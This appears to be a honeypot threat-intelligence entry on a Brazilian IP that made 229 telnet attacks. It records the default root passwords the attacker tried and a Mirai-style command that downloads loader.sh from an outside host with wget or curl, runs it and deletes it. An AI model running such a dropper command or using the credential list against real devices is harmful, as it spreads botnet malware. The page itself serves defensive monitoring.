TROYANOSYVIRUS
Active ThreatMEDIUM

109.104.155.28

Country of Origin🇧🇷 Brazil
First Detection4/18/2026
Last Activity4/18/2026
ISPBrainStorm Network, Inc
🎯
229
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
2
Malware

Geolocation

Country
🇧🇷 Brazil
City
São Paulo
ASN
AS136258
ISP
BrainStorm Network, Inc

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

🔐root/root
14x
🔐root/password
14x
🔐root/(empty)
14x
🔐root/admin
14x

Executed Commands

$echo mirai14x
$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x13x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

45
/100
LowMediumHighCritical